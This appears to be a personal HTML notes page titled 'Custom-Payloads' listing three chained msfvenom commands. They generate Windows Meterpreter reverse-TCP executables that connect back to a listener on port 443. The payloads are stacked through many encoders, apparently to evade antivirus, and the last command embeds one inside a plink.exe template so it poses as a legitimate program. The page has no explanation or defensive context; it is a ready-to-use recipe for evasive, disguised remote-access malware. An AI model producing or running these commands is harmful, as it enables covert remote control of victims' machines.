<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Custom-Payloads</title>
</head><body>this is a chained command -- enter it one line at a time<br/>
=========================================================<br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.53 LPORT=443 -f raw -e x86/shikata_ga_nai -i 10 | \<br/>
msfvenom -a x86 --platform windows -e x86/countdown -i 8 &nbsp;-f raw | \<br/>
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe<br/>
<br/>
========================================================<br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.53 LPORT=443 -f raw -e x86/shikata_ga_nai -i 10 | \<br/>
msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 8 &nbsp;-f raw | \<br/>
msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 8 &nbsp;-f raw | \<br/>
msfvenom -a x86 --platform windows -e x86/countdown -i 8 &nbsp;-f raw | \<br/>
msfvenom -a x86 --platform windows -e x86/fnstenv_mov -i 8 &nbsp;-f raw | \<br/>
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe<br/>
<br/>
========================================================<br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.234 LPORT=443 R | \<br/>
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -t exe -c --platform windows /usr/share/windows-binaries/plink.exe -o beffany.exe</body></html>